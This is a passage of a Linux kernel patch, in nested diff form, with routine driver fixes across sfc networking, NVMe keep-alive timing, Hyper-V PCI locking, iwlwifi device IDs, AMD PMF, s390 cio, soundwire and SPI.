+ 			break;
+ 		case ESE_DZ_EV_CODE_TX_EV:
+-			efx_ef10_handle_tx_event(channel, &event);
++			spent_tx += efx_ef10_handle_tx_event(channel, &event);
++			if (spent_tx >= EFX_NAPI_MAX_TX) {
++				spent = quota;
++				goto out;
++			}
+ 			break;
+ 		case ESE_DZ_EV_CODE_DRIVER_EV:
+ 			efx_ef10_handle_driver_event(channel, &event);
+diff --git a/drivers/net/ethernet/sfc/ef100_nic.c b/drivers/net/ethernet/sfc/ef100_nic.c
+index ad686c671ab89..fa1f7039a8e28 100644
+--- a/drivers/net/ethernet/sfc/ef100_nic.c
++++ b/drivers/net/ethernet/sfc/ef100_nic.c
+@@ -242,6 +242,8 @@ static void ef100_ev_read_ack(struct efx_channel *channel)
+ 		   efx_reg(channel->efx, ER_GZ_EVQ_INT_PRIME));
+ }
+ 
++#define EFX_NAPI_MAX_TX 512
++
+ static int ef100_ev_process(struct efx_channel *channel, int quota)
+ {
+ 	struct efx_nic *efx = channel->efx;
+@@ -249,6 +251,7 @@ static int ef100_ev_process(struct efx_channel *channel, int quota)
+ 	bool evq_phase, old_evq_phase;
+ 	unsigned int read_ptr;
+ 	efx_qword_t *p_event;
++	int spent_tx = 0;
+ 	int spent = 0;
+ 	bool ev_phase;
+ 	int ev_type;
+@@ -284,7 +287,9 @@ static int ef100_ev_process(struct efx_channel *channel, int quota)
+ 			efx_mcdi_process_event(channel, p_event);
+ 			break;
+ 		case ESE_GZ_EF100_EV_TX_COMPLETION:
+-			ef100_ev_tx(channel, p_event);
++			spent_tx += ef100_ev_tx(channel, p_event);
++			if (spent_tx >= EFX_NAPI_MAX_TX)
++				spent = quota;
+ 			break;
+ 		case ESE_GZ_EF100_EV_DRIVER:
+ 			netif_info(efx, drv, efx->net_dev,
+diff --git a/drivers/net/ethernet/sfc/ef100_tx.c b/drivers/net/ethernet/sfc/ef100_tx.c
+index 29ffaf35559d6..849e5555bd128 100644
+--- a/drivers/net/ethernet/sfc/ef100_tx.c
++++ b/drivers/net/ethernet/sfc/ef100_tx.c
+@@ -346,7 +346,7 @@ void ef100_tx_write(struct efx_tx_queue *tx_queue)
+ 	ef100_tx_push_buffers(tx_queue);
+ }
+ 
+-void ef100_ev_tx(struct efx_channel *channel, const efx_qword_t *p_event)
++int ef100_ev_tx(struct efx_channel *channel, const efx_qword_t *p_event)
+ {
+ 	unsigned int tx_done =
+ 		EFX_QWORD_FIELD(*p_event, ESF_GZ_EV_TXCMPL_NUM_DESC);
+@@ -357,7 +357,7 @@ void ef100_ev_tx(struct efx_channel *channel, const efx_qword_t *p_event)
+ 	unsigned int tx_index = (tx_queue->read_count + tx_done - 1) &
+ 				tx_queue->ptr_mask;
+ 
+-	efx_xmit_done(tx_queue, tx_index);
++	return efx_xmit_done(tx_queue, tx_index);
+ }
+ 
+ /* Add a socket buffer to a TX queue
+diff --git a/drivers/net/ethernet/sfc/ef100_tx.h b/drivers/net/ethernet/sfc/ef100_tx.h
+index e9e11540fcdea..d9a0819c5a72c 100644
+--- a/drivers/net/ethernet/sfc/ef100_tx.h
++++ b/drivers/net/ethernet/sfc/ef100_tx.h
+@@ -20,7 +20,7 @@ void ef100_tx_init(struct efx_tx_queue *tx_queue);
+ void ef100_tx_write(struct efx_tx_queue *tx_queue);
+ unsigned int ef100_tx_max_skb_descs(struct efx_nic *efx);
+ 
+-void ef100_ev_tx(struct efx_channel *channel, const efx_qword_t *p_event);
++int ef100_ev_tx(struct efx_channel *channel, const efx_qword_t *p_event);
+ 
+ netdev_tx_t ef100_enqueue_skb(struct efx_tx_queue *tx_queue, struct sk_buff *skb);
+ int __ef100_enqueue_skb(struct efx_tx_queue *tx_queue, struct sk_buff *skb,
+diff --git a/drivers/net/ethernet/sfc/tx_common.c b/drivers/net/ethernet/sfc/tx_common.c
+index 67e789b96c437..755aa92bf8236 100644
+--- a/drivers/net/ethernet/sfc/tx_common.c
++++ b/drivers/net/ethernet/sfc/tx_common.c
+@@ -249,7 +249,7 @@ void efx_xmit_done_check_empty(struct efx_tx_queue *tx_queue)
+ 	}
+ }
+ 
+-void efx_xmit_done(struct efx_tx_queue *tx_queue, unsigned int index)
++int efx_xmit_done(struct efx_tx_queue *tx_queue, unsigned int index)
+ {
+ 	unsigned int fill_level, pkts_compl = 0, bytes_compl = 0;
+ 	unsigned int efv_pkts_compl = 0;
+@@ -279,6 +279,8 @@ void efx_xmit_done(struct efx_tx_queue *tx_queue, unsigned int index)
+ 	}
+ 
+ 	efx_xmit_done_check_empty(tx_queue);
++
++	return pkts_compl + efv_pkts_compl;
+ }
+ 
+ /* Remove buffers put into a tx_queue for the current packet.
+diff --git a/drivers/net/ethernet/sfc/tx_common.h b/drivers/net/ethernet/sfc/tx_common.h
+index d87aecbc7bf1a..1e9f42938aac9 100644
+--- a/drivers/net/ethernet/sfc/tx_common.h
++++ b/drivers/net/ethernet/sfc/tx_common.h
+@@ -28,7 +28,7 @@ static inline bool efx_tx_buffer_in_use(struct efx_tx_buffer *buffer)
+ }
+ 
+ void efx_xmit_done_check_empty(struct efx_tx_queue *tx_queue);
+-void efx_xmit_done(struct efx_tx_queue *tx_queue, unsigned int index);
++int efx_xmit_done(struct efx_tx_queue *tx_queue, unsigned int index);
+ 
+ void efx_enqueue_unwind(struct efx_tx_queue *tx_queue,
+ 			unsigned int insert_count);
+diff --git a/drivers/net/ieee802154/mac802154_hwsim.c b/drivers/net/ieee802154/mac802154_hwsim.c
+index 2f0544dd7c2ad..9b3da61840a8f 100644
+--- a/drivers/net/ieee802154/mac802154_hwsim.c
++++ b/drivers/net/ieee802154/mac802154_hwsim.c
+@@ -522,7 +522,7 @@ static int hwsim_del_edge_nl(struct sk_buff *msg, struct genl_info *info)
+ static int hwsim_set_edge_lqi(struct sk_buff *msg, struct genl_info *info)
+ {
+ 	struct nlattr *edge_attrs[MAC802154_HWSIM_EDGE_ATTR_MAX + 1];
+-	struct hwsim_edge_info *einfo;
++	struct hwsim_edge_info *einfo, *einfo_old;
+ 	struct hwsim_phy *phy_v0;
+ 	struct hwsim_edge *e;
+ 	u32 v0, v1;
+@@ -560,8 +560,10 @@ static int hwsim_set_edge_lqi(struct sk_buff *msg, struct genl_info *info)
+ 	list_for_each_entry_rcu(e, &phy_v0->edges, list) {
+ 		if (e->endpoint->idx == v1) {
+ 			einfo->lqi = lqi;
+-			rcu_assign_pointer(e->info, einfo);
++			einfo_old = rcu_replace_pointer(e->info, einfo,
++							lockdep_is_held(&hwsim_phys_lock));
+ 			rcu_read_unlock();
++			kfree_rcu(einfo_old, rcu);
+ 			mutex_unlock(&hwsim_phys_lock);
+ 			return 0;
+ 		}
+diff --git a/drivers/net/phy/dp83867.c b/drivers/net/phy/dp83867.c
+index 14990f8462ae3..f7436191fa807 100644
+--- a/drivers/net/phy/dp83867.c
++++ b/drivers/net/phy/dp83867.c
+@@ -905,7 +905,7 @@ static int dp83867_phy_reset(struct phy_device *phydev)
+ {
+ 	int err;
+ 
+-	err = phy_write(phydev, DP83867_CTRL, DP83867_SW_RESTART);
++	err = phy_write(phydev, DP83867_CTRL, DP83867_SW_RESET);
+ 	if (err < 0)
+ 		return err;
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/drv.c b/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
+index 03e8234d03520..f6872b2a0d9d0 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
+@@ -547,6 +547,8 @@ static const struct iwl_dev_info iwl_dev_info_table[] = {
+ 	IWL_DEV_INFO(0x54F0, 0x1692, iwlax411_2ax_cfg_so_gf4_a0, iwl_ax411_killer_1690i_name),
+ 	IWL_DEV_INFO(0x7A70, 0x1691, iwlax411_2ax_cfg_so_gf4_a0, iwl_ax411_killer_1690s_name),
+ 	IWL_DEV_INFO(0x7A70, 0x1692, iwlax411_2ax_cfg_so_gf4_a0, iwl_ax411_killer_1690i_name),
++	IWL_DEV_INFO(0x7AF0, 0x1691, iwlax411_2ax_cfg_so_gf4_a0, iwl_ax411_killer_1690s_name),
++	IWL_DEV_INFO(0x7AF0, 0x1692, iwlax411_2ax_cfg_so_gf4_a0, iwl_ax411_killer_1690i_name),
+ 
+ 	IWL_DEV_INFO(0x271C, 0x0214, iwl9260_2ac_cfg, iwl9260_1_name),
+ 	IWL_DEV_INFO(0x7E40, 0x1691, iwl_cfg_ma_a0_gf4_a0, iwl_ax411_killer_1690s_name),
+diff --git a/drivers/nfc/nfcsim.c b/drivers/nfc/nfcsim.c
+index 85bf8d586c707..0f6befe8be1e2 100644
+--- a/drivers/nfc/nfcsim.c
++++ b/drivers/nfc/nfcsim.c
+@@ -336,10 +336,6 @@ static struct dentry *nfcsim_debugfs_root;
+ static void nfcsim_debugfs_init(void)
+ {
+ 	nfcsim_debugfs_root = debugfs_create_dir("nfcsim", NULL);
+-
+-	if (!nfcsim_debugfs_root)
+-		pr_err("Could not create debugfs entry\n");
+-
+ }
+ 
+ static void nfcsim_debugfs_remove(void)
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 2e22c78991ccf..a7d9b5b42b388 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -395,7 +395,16 @@ void nvme_complete_rq(struct request *req)
+ 	trace_nvme_complete_rq(req);
+ 	nvme_cleanup_cmd(req);
+ 
+-	if (ctrl->kas)
++	/*
++	 * Completions of long-running commands should not be able to
++	 * defer sending of periodic keep alives, since the controller
++	 * may have completed processing such commands a long time ago
++	 * (arbitrarily close to command submission time).
++	 * req->deadline - req->timeout is the command submission time
++	 * in jiffies.
++	 */
++	if (ctrl->kas &&
++	    req->deadline - req->timeout >= ctrl->ka_last_check_time)
+ 		ctrl->comp_seen = true;
+ 
+ 	switch (nvme_decide_disposition(req)) {
+@@ -1198,9 +1207,25 @@ EXPORT_SYMBOL_NS_GPL(nvme_execute_passthru_rq, NVME_TARGET_PASSTHRU);
+  *   The host should send Keep Alive commands at half of the Keep Alive Timeout
+  *   accounting for transport roundtrip times [..].
+  */
++static unsigned long nvme_keep_alive_work_period(struct nvme_ctrl *ctrl)
++{
++	unsigned long delay = ctrl->kato * HZ / 2;
++
++	/*
++	 * When using Traffic Based Keep Alive, we need to run
++	 * nvme_keep_alive_work at twice the normal frequency, as one
++	 * command completion can postpone sending a keep alive command
++	 * by up to twice the delay between runs.
++	 */
++	if (ctrl->ctratt & NVME_CTRL_ATTR_TBKAS)
++		delay /= 2;
++	return delay;
++}
++
+ static void nvme_queue_keep_alive_work(struct nvme_ctrl *ctrl)
+ {
+-	queue_delayed_work(nvme_wq, &ctrl->ka_work, ctrl->kato * HZ / 2);
++	queue_delayed_work(nvme_wq, &ctrl->ka_work,
++			   nvme_keep_alive_work_period(ctrl));
+ }
+ 
+ static enum rq_end_io_ret nvme_keep_alive_end_io(struct request *rq,
+@@ -1209,6 +1234,20 @@ static enum rq_end_io_ret nvme_keep_alive_end_io(struct request *rq,
+ 	struct nvme_ctrl *ctrl = rq->end_io_data;
+ 	unsigned long flags;
+ 	bool startka = false;
++	unsigned long rtt = jiffies - (rq->deadline - rq->timeout);
++	unsigned long delay = nvme_keep_alive_work_period(ctrl);
++
++	/*
++	 * Subtract off the keepalive RTT so nvme_keep_alive_work runs
++	 * at the desired frequency.
++	 */
++	if (rtt <= delay) {
++		delay -= rtt;
++	} else {
++		dev_warn(ctrl->device, "long keepalive RTT (%u ms)\n",
++			 jiffies_to_msecs(rtt));
++		delay = 0;
++	}
+ 
+ 	blk_mq_free_request(rq);
+ 
+@@ -1219,6 +1258,7 @@ static enum rq_end_io_ret nvme_keep_alive_end_io(struct request *rq,
+ 		return RQ_END_IO_NONE;
+ 	}
+ 
++	ctrl->ka_last_check_time = jiffies;
+ 	ctrl->comp_seen = false;
+ 	spin_lock_irqsave(&ctrl->lock, flags);
+ 	if (ctrl->state == NVME_CTRL_LIVE ||
+@@ -1226,7 +1266,7 @@ static enum rq_end_io_ret nvme_keep_alive_end_io(struct request *rq,
+ 		startka = true;
+ 	spin_unlock_irqrestore(&ctrl->lock, flags);
+ 	if (startka)
+-		nvme_queue_keep_alive_work(ctrl);
++		queue_delayed_work(nvme_wq, &ctrl->ka_work, delay);
+ 	return RQ_END_IO_NONE;
+ }
+ 
+@@ -1237,6 +1277,8 @@ static void nvme_keep_alive_work(struct work_struct *work)
+ 	bool comp_seen = ctrl->comp_seen;
+ 	struct request *rq;
+ 
++	ctrl->ka_last_check_time = jiffies;
++
+ 	if ((ctrl->ctratt & NVME_CTRL_ATTR_TBKAS) && comp_seen) {
+ 		dev_dbg(ctrl->device,
+ 			"reschedule traffic based keep-alive timer\n");
+diff --git a/drivers/nvme/host/nvme.h b/drivers/nvme/host/nvme.h
+index 3f82de6060ef7..2aa514c3dfa17 100644
+--- a/drivers/nvme/host/nvme.h
++++ b/drivers/nvme/host/nvme.h
+@@ -323,6 +323,7 @@ struct nvme_ctrl {
+ 	struct delayed_work ka_work;
+ 	struct delayed_work failfast_work;
+ 	struct nvme_command ka_cmd;
++	unsigned long ka_last_check_time;
+ 	struct work_struct fw_act_work;
+ 	unsigned long events;
+ 
+diff --git a/drivers/pci/controller/pci-hyperv.c b/drivers/pci/controller/pci-hyperv.c
+index f1ec8931dfbc5..3351863352d36 100644
+--- a/drivers/pci/controller/pci-hyperv.c
++++ b/drivers/pci/controller/pci-hyperv.c
+@@ -489,7 +489,10 @@ struct hv_pcibus_device {
+ 	struct fwnode_handle *fwnode;
+ 	/* Protocol version negotiated with the host */
+ 	enum pci_protocol_version_t protocol_version;
++
++	struct mutex state_lock;
+ 	enum hv_pcibus_state state;
++
+ 	struct hv_device *hdev;
+ 	resource_size_t low_mmio_space;
+ 	resource_size_t high_mmio_space;
+@@ -553,19 +556,10 @@ struct hv_dr_state {
+ 	struct hv_pcidev_description func[];
+ };
+ 
+-enum hv_pcichild_state {
+-	hv_pcichild_init = 0,
+-	hv_pcichild_requirements,
+-	hv_pcichild_resourced,
+-	hv_pcichild_ejecting,
+-	hv_pcichild_maximum
+-};
+-
+ struct hv_pci_dev {
+ 	/* List protected by pci_rescan_remove_lock */
+ 	struct list_head list_entry;
+ 	refcount_t refs;
+-	enum hv_pcichild_state state;
+ 	struct pci_slot *pci_slot;
+ 	struct hv_pcidev_description desc;
+ 	bool reported_missing;
+@@ -656,6 +650,11 @@ static void hv_arch_irq_unmask(struct irq_data *data)
+ 	pbus = pdev->bus;
+ 	hbus = container_of(pbus->sysdata, struct hv_pcibus_device, sysdata);
+ 	int_desc = data->chip_data;
++	if (!int_desc) {
++		dev_warn(&hbus->hdev->device, "%s() can not unmask irq %u\n",
++			 __func__, data->irq);
++		return;
++	}
+ 
+ 	spin_lock_irqsave(&hbus->retarget_msi_interrupt_lock, flags);
+ 
+@@ -1924,12 +1923,6 @@ static void hv_compose_msi_msg(struct irq_data *data, struct msi_msg *msg)
+ 		hv_pci_onchannelcallback(hbus);
+ 		spin_unlock_irqrestore(&channel->sched_lock, flags);
+ 
+-		if (hpdev->state == hv_pcichild_ejecting) {
+-			dev_err_once(&hbus->hdev->device,
+-				     "the device is being ejected\n");
+-			goto enable_tasklet;
+-		}
+-
+ 		udelay(100);
+ 	}
+ 
+@@ -2535,6 +2528,8 @@ static void pci_devices_present_work(struct work_struct *work)
+ 	if (!dr)
+ 		return;
+ 
++	mutex_lock(&hbus->state_lock);
++
+ 	/* First, mark all existing children as reported missing. */
+ 	spin_lock_irqsave(&hbus->device_list_lock, flags);
+ 	list_for_each_entry(hpdev, &hbus->children, list_entry) {
+@@ -2616,6 +2611,8 @@ static void pci_devices_present_work(struct work_struct *work)
+ 		break;
+ 	}
+ 
++	mutex_unlock(&hbus->state_lock);
++
+ 	kfree(dr);
+ }
+ 
+@@ -2764,7 +2761,7 @@ static void hv_eject_device_work(struct work_struct *work)
+ 	hpdev = container_of(work, struct hv_pci_dev, wrk);
+ 	hbus = hpdev->hbus;
+ 
+-	WARN_ON(hpdev->state != hv_pcichild_ejecting);
++	mutex_lock(&hbus->state_lock);
+ 
+ 	/*
+ 	 * Ejection can come before or after the PCI bus has been set up, so
+@@ -2802,6 +2799,8 @@ static void hv_eject_device_work(struct work_struct *work)
+ 	put_pcichild(hpdev);
+ 	put_pcichild(hpdev);
+ 	/* hpdev has been freed. Do not use it any more. */
++
++	mutex_unlock(&hbus->state_lock);
+ }
+ 
+ /**
+@@ -2822,7 +2821,6 @@ static void hv_pci_eject_device(struct hv_pci_dev *hpdev)
+ 		return;
+ 	}
+ 
+-	hpdev->state = hv_pcichild_ejecting;
+ 	get_pcichild(hpdev);
+ 	INIT_WORK(&hpdev->wrk, hv_eject_device_work);
+ 	queue_work(hbus->wq, &hpdev->wrk);
+@@ -3251,8 +3249,10 @@ static int hv_pci_enter_d0(struct hv_device *hdev)
+ 	struct pci_bus_d0_entry *d0_entry;
+ 	struct hv_pci_compl comp_pkt;
+ 	struct pci_packet *pkt;
++	bool retry = true;
+ 	int ret;
+ 
++enter_d0_retry:
+ 	/*
+ 	 * Tell the host that the bus is ready to use, and moved into the
+ 	 * powered-on state.  This includes telling the host which region
+@@ -3279,6 +3279,38 @@ static int hv_pci_enter_d0(struct hv_device *hdev)
+ 	if (ret)
+ 		goto exit;
+ 
++	/*
++	 * In certain case (Kdump) the pci device of interest was
++	 * not cleanly shut down and resource is still held on host
++	 * side, the host could return invalid device status.
++	 * We need to explicitly request host to release the resource
++	 * and try to enter D0 again.
++	 */
++	if (comp_pkt.completion_status < 0 && retry) {
++		retry = false;
++
++		dev_err(&hdev->device, "Retrying D0 Entry\n");
++
++		/*
++		 * Hv_pci_bus_exit() calls hv_send_resource_released()
++		 * to free up resources of its child devices.
++		 * In the kdump kernel we need to set the
++		 * wslot_res_allocated to 255 so it scans all child
++		 * devices to release resources allocated in the
++		 * normal kernel before panic happened.
++		 */
++		hbus->wslot_res_allocated = 255;
++
++		ret = hv_pci_bus_exit(hdev, true);
++
++		if (ret == 0) {
++			kfree(pkt);
++			goto enter_d0_retry;
++		}
++		dev_err(&hdev->device,
++			"Retrying D0 failed with ret %d\n", ret);
++	}
++
+ 	if (comp_pkt.completion_status < 0) {
+ 		dev_err(&hdev->device,
+ 			"PCI Pass-through VSP failed D0 Entry with status %x\n",
+@@ -3321,6 +3353,24 @@ static int hv_pci_query_relations(struct hv_device *hdev)
+ 	if (!ret)
+ 		ret = wait_for_response(hdev, &comp);
+ 
++	/*
++	 * In the case of fast device addition/removal, it's possible that
++	 * vmbus_sendpacket() or wait_for_response() returns -ENODEV but we
++	 * already got a PCI_BUS_RELATIONS* message from the host and the
++	 * channel callback already scheduled a work to hbus->wq, which can be
++	 * running pci_devices_present_work() -> survey_child_resources() ->
++	 * complete(&hbus->survey_event), even after hv_pci_query_relations()
++	 * exits and the stack variable 'comp' is no longer valid; as a result,
++	 * a hang or a page fault may happen when the complete() calls
++	 * raw_spin_lock_irqsave(). Flush hbus->wq before we exit from
++	 * hv_pci_query_relations() to avoid the issues. Note: if 'ret' is
++	 * -ENODEV, there can't be any more work item scheduled to hbus->wq
++	 * after the flush_workqueue(): see vmbus_onoffer_rescind() ->
++	 * vmbus_reset_channel_cb(), vmbus_rescind_cleanup() ->
++	 * channel->rescind = true.
++	 */
++	flush_workqueue(hbus->wq);
++
+ 	return ret;
+ }
+ 
+@@ -3506,7 +3556,6 @@ static int hv_pci_probe(struct hv_device *hdev,
+ 	struct hv_pcibus_device *hbus;
+ 	u16 dom_req, dom;
+ 	char *name;
+-	bool enter_d0_retry = true;
+ 	int ret;
+ 
+ 	/*
+@@ -3542,6 +3591,7 @@ static int hv_pci_probe(struct hv_device *hdev,
+ 		return -ENOMEM;
+ 
+ 	hbus->bridge = bridge;
++	mutex_init(&hbus->state_lock);
+ 	hbus->state = hv_pcibus_init;
+ 	hbus->wslot_res_allocated = -1;
+ 
+@@ -3646,49 +3696,15 @@ static int hv_pci_probe(struct hv_device *hdev,
+ 	if (ret)
+ 		goto free_fwnode;
+ 
+-retry:
+ 	ret = hv_pci_query_relations(hdev);
+ 	if (ret)
+ 		goto free_irq_domain;
+ 
+-	ret = hv_pci_enter_d0(hdev);
+-	/*
+-	 * In certain case (Kdump) the pci device of interest was
+-	 * not cleanly shut down and resource is still held on host
+-	 * side, the host could return invalid device status.
+-	 * We need to explicitly request host to release the resource
+-	 * and try to enter D0 again.
+-	 * Since the hv_pci_bus_exit() call releases structures
+-	 * of all its child devices, we need to start the retry from
+-	 * hv_pci_query_relations() call, requesting host to send
+-	 * the synchronous child device relations message before this
+-	 * information is needed in hv_send_resources_allocated()
+-	 * call later.
+-	 */
+-	if (ret == -EPROTO && enter_d0_retry) {
+-		enter_d0_retry = false;
+-
+-		dev_err(&hdev->device, "Retrying D0 Entry\n");
+-
+-		/*
+-		 * Hv_pci_bus_exit() calls hv_send_resources_released()
+-		 * to free up resources of its child devices.
+-		 * In the kdump kernel we need to set the
+-		 * wslot_res_allocated to 255 so it scans all child
+-		 * devices to release resources allocated in the
+-		 * normal kernel before panic happened.
+-		 */
+-		hbus->wslot_res_allocated = 255;
+-		ret = hv_pci_bus_exit(hdev, true);
+-
+-		if (ret == 0)
+-			goto retry;
++	mutex_lock(&hbus->state_lock);
+ 
+-		dev_err(&hdev->device,
+-			"Retrying D0 failed with ret %d\n", ret);
+-	}
++	ret = hv_pci_enter_d0(hdev);
+ 	if (ret)
+-		goto free_irq_domain;
++		goto release_state_lock;
+ 
+ 	ret = hv_pci_allocate_bridge_windows(hbus);
+ 	if (ret)
+@@ -3706,12 +3722,15 @@ retry:
+ 	if (ret)
+ 		goto free_windows;
+ 
++	mutex_unlock(&hbus->state_lock);
+ 	return 0;
+ 
+ free_windows:
+ 	hv_pci_free_bridge_windows(hbus);
+ exit_d0:
+ 	(void) hv_pci_bus_exit(hdev, true);
++release_state_lock:
++	mutex_unlock(&hbus->state_lock);
+ free_irq_domain:
+ 	irq_domain_remove(hbus->irq_domain);
+ free_fwnode:
+@@ -3965,20 +3984,26 @@ static int hv_pci_resume(struct hv_device *hdev)
+ 	if (ret)
+ 		goto out;
+ 
++	mutex_lock(&hbus->state_lock);
++
+ 	ret = hv_pci_enter_d0(hdev);
+ 	if (ret)
+-		goto out;
++		goto release_state_lock;
+ 
+ 	ret = hv_send_resources_allocated(hdev);
+ 	if (ret)
+-		goto out;
++		goto release_state_lock;
+ 
+ 	prepopulate_bars(hbus);
+ 
+ 	hv_pci_restore_msi_state(hbus);
+ 
+ 	hbus->state = hv_pcibus_installed;
++	mutex_unlock(&hbus->state_lock);
+ 	return 0;
++
++release_state_lock:
++	mutex_unlock(&hbus->state_lock);
+ out:
+ 	vmbus_close(hdev->channel);
+ 	return ret;
+diff --git a/drivers/platform/x86/amd/pmf/core.c b/drivers/platform/x86/amd/pmf/core.c
+index dc9803e1a4b9b..73d2357e32f8e 100644
+--- a/drivers/platform/x86/amd/pmf/core.c
++++ b/drivers/platform/x86/amd/pmf/core.c
+@@ -297,6 +297,8 @@ static void amd_pmf_init_features(struct amd_pmf_dev *dev)
+ 	/* Enable Static Slider */
+ 	if (is_apmf_func_supported(dev, APMF_FUNC_STATIC_SLIDER_GRANULAR)) {
+ 		amd_pmf_init_sps(dev);
++		dev->pwr_src_notifier.notifier_call = amd_pmf_pwr_src_notify_call;
++		power_supply_reg_notifier(&dev->pwr_src_notifier);
+ 		dev_dbg(dev->dev, "SPS enabled and Platform Profiles registered\n");
+ 	}
+ 
+@@ -315,8 +317,10 @@ static void amd_pmf_init_features(struct amd_pmf_dev *dev)
+ 
+ static void amd_pmf_deinit_features(struct amd_pmf_dev *dev)
+ {
+-	if (is_apmf_func_supported(dev, APMF_FUNC_STATIC_SLIDER_GRANULAR))
++	if (is_apmf_func_supported(dev, APMF_FUNC_STATIC_SLIDER_GRANULAR)) {
++		power_supply_unreg_notifier(&dev->pwr_src_notifier);
+ 		amd_pmf_deinit_sps(dev);
++	}
+ 
+ 	if (is_apmf_func_supported(dev, APMF_FUNC_AUTO_MODE)) {
+ 		amd_pmf_deinit_auto_mode(dev);
+@@ -399,9 +403,6 @@ static int amd_pmf_probe(struct platform_device *pdev)
+ 	apmf_install_handler(dev);
+ 	amd_pmf_dbgfs_register(dev);
+ 
+-	dev->pwr_src_notifier.notifier_call = amd_pmf_pwr_src_notify_call;
+-	power_supply_reg_notifier(&dev->pwr_src_notifier);
+-
+ 	dev_info(dev->dev, "registered PMF device successfully\n");
+ 
+ 	return 0;
+@@ -411,7 +412,6 @@ static int amd_pmf_remove(struct platform_device *pdev)
+ {
+ 	struct amd_pmf_dev *dev = platform_get_drvdata(pdev);
+ 
+-	power_supply_unreg_notifier(&dev->pwr_src_notifier);
+ 	amd_pmf_deinit_features(dev);
+ 	apmf_acpi_deinit(dev);
+ 	amd_pmf_dbgfs_unregister(dev);
+diff --git a/drivers/s390/cio/device.c b/drivers/s390/cio/device.c
+index ba4c69226c337..02813b63f90fd 100644
+--- a/drivers/s390/cio/device.c
++++ b/drivers/s390/cio/device.c
+@@ -1367,6 +1367,7 @@ void ccw_device_set_notoper(struct ccw_device *cdev)
+ enum io_sch_action {
+ 	IO_SCH_UNREG,
+ 	IO_SCH_ORPH_UNREG,
++	IO_SCH_UNREG_CDEV,
+ 	IO_SCH_ATTACH,
+ 	IO_SCH_UNREG_ATTACH,
+ 	IO_SCH_ORPH_ATTACH,
+@@ -1399,7 +1400,7 @@ static enum io_sch_action sch_get_action(struct subchannel *sch)
+ 	}
+ 	if ((sch->schib.pmcw.pam & sch->opm) == 0) {
+ 		if (ccw_device_notify(cdev, CIO_NO_PATH) != NOTIFY_OK)
+-			return IO_SCH_UNREG;
++			return IO_SCH_UNREG_CDEV;
+ 		return IO_SCH_DISC;
+ 	}
+ 	if (device_is_disconnected(cdev))
+@@ -1461,6 +1462,7 @@ static int io_subchannel_sch_event(struct subchannel *sch, int process)
+ 	case IO_SCH_ORPH_ATTACH:
+ 		ccw_device_set_disconnected(cdev);
+ 		break;
++	case IO_SCH_UNREG_CDEV:
+ 	case IO_SCH_UNREG_ATTACH:
+ 	case IO_SCH_UNREG:
+ 		if (!cdev)
+@@ -1494,6 +1496,7 @@ static int io_subchannel_sch_event(struct subchannel *sch, int process)
+ 		if (rc)
+ 			goto out;
+ 		break;
++	case IO_SCH_UNREG_CDEV:
+ 	case IO_SCH_UNREG_ATTACH:
+ 		spin_lock_irqsave(sch->lock, flags);
+ 		sch_set_cdev(sch, NULL);
+diff --git a/drivers/soundwire/dmi-quirks.c b/drivers/soundwire/dmi-quirks.c
+index 58ea013fa918a..2a1096dab63d3 100644
+--- a/drivers/soundwire/dmi-quirks.c
++++ b/drivers/soundwire/dmi-quirks.c
+@@ -99,6 +99,13 @@ static const struct dmi_system_id adr_remap_quirk_table[] = {
+ 		},
+ 		.driver_data = (void *)intel_tgl_bios,
+ 	},
++	{
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "HP"),
++			DMI_MATCH(DMI_BOARD_NAME, "8709"),
++		},
++		.driver_data = (void *)intel_tgl_bios,
++	},
+ 	{
+ 		/* quirk used for NUC15 'Bishop County' LAPBC510 and LAPBC710 skews */
+ 		.matches = {
+diff --git a/drivers/soundwire/qcom.c b/drivers/soundwire/qcom.c
+index 21c50972047f5..b2eb3090f4b46 100644
+--- a/drivers/soundwire/qcom.c
++++ b/drivers/soundwire/qcom.c
+@@ -1090,8 +1090,10 @@ static int qcom_swrm_startup(struct snd_pcm_substream *substream,
+ 	}
+ 
+ 	sruntime = sdw_alloc_stream(dai->name);
+-	if (!sruntime)
+-		return -ENOMEM;
++	if (!sruntime) {
++		ret = -ENOMEM;
++		goto err_alloc;
++	}
+ 
+ 	ctrl->sruntime[dai->id] = sruntime;
+ 
+@@ -1101,12 +1103,19 @@ static int qcom_swrm_startup(struct snd_pcm_substream *substream,
+ 		if (ret < 0 && ret != -ENOTSUPP) {
+ 			dev_err(dai->dev, "Failed to set sdw stream on %s\n",
+ 				codec_dai->name);
+-			sdw_release_stream(sruntime);
+-			return ret;
++			goto err_set_stream;
+ 		}
+ 	}
+ 
+ 	return 0;
++
++err_set_stream:
++	sdw_release_stream(sruntime);
++err_alloc:
++	pm_runtime_mark_last_busy(ctrl->dev);
++	pm_runtime_put_autosuspend(ctrl->dev);
++
++	return ret;
+ }
+ 
+ static void qcom_swrm_shutdown(struct snd_pcm_substream *substream,
+diff --git a/drivers/spi/spi-fsl-lpspi.c b/drivers/spi/spi-fsl-lpspi.c
+index e8c1c8a4c6c82..9e324d72596af 100644
+--- a/drivers/spi/spi-fsl-lpspi.c
++++ b/drivers/spi/spi-fsl-lpspi.c
+@@ -905,9 +905,14 @@ static int fsl_lpspi_probe(struct platform_device *pdev)
+ 	ret = fsl_lpspi_dma_init(&pdev->dev, fsl_lpspi, controller);
+ 	if (ret == -EPROBE_DEFER)
+ 		goto out_pm_get;
+-
+ 	if (ret < 0)
+ 		dev_err(&pdev->dev, "dma setup error %d, use pio\n", ret);
++	else
++		/*
++		 * disable LPSPI module IRQ when enable DMA mode successfully,
++		 * to prevent the unexpected LPSPI module IRQ events.
++		 */
++		disable_irq(irq);
+ 
+ 	ret = devm_spi_register_controller(&pdev->dev, controller);
+ 	if (ret < 0) {
+diff --git a/drivers/spi/spi-geni-qcom.c b/drivers/spi/spi-geni-qcom.c
+index 4e83cc5b445d8..dd1581893fe72 100644
+--- a/drivers/spi/spi-geni-qcom.c
++++ b/drivers/spi/spi-geni-qcom.c
+@@ -595,6 +595,8 @@ static int spi_geni_init(struct spi_geni_master *mas)
+ 			geni_se_select_mode(se, GENI_GPI_DMA);
